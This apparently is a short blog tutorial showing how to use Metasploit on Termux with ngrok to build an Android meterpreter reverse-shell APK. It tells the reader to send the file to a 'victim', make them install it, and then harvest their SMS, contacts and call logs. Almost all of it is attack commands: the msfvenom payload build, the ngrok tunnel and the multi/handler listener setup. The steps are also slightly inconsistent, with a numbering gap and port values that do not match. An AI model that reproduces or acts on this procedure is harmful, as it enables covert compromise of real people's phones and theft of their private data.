How To Install Metasploit in Termux
Commands
1.pkg update
2.pkg install repo
3.pkg install unstable-repo
wait for 10-15 mints metasploit successfully installed After istallation it is show as the image given above as MetaSploit Frame work installation Finished..
5.now open metasploit-framework
6.msfconsole
It takes 2 min and open a window like the image given below
It takes 2 min and open a window like the image given below
Open new terminal and write Command= ./ngrok tcp 4345
It will show a window like this below given
Again Open one more terminal to create a payload
Commands
1. msfvenom -p android/meterpreter/reverse_tcp LHOST= ngrokip LPORT= ngrokport R>alkr.apk
[AFTER LHOST={RED} TYPE AS SHOWN IN IMAGE BELOW AFTER LPORT={YELLOW}TYPE AS SHOWN INTHE IMAGE (you get in ngrok terminal)]
Run this command and wait for 2 mints.
Now payload is created
2. ls (run ls command to check your Apk file location)
App is saved in home folder
To copy the app to your storage use command
2.cp alkr.apk /storage/emulated/0/DCIM/ (you can change to your precised location)
Send the Apk file to victim
Make the Victim install and open the app
Open Metasploit Framework
Again open a new session
Commands
1.msfconsole
2.use exploit/multi/handler
3.set payload android/meterpreter/reverse_tcp
4.set LHOST localhost
5.set LPORT 4543
6.exploit
After that it will show a window like the image given below
- All Finished Now Just add command 'help' for all commands getting sms, contacts, call logs.. etc Enjoy
- Youtube Video Tutorial: https://youtu.be/iziAU4UvOEQ
Comments
Post a Comment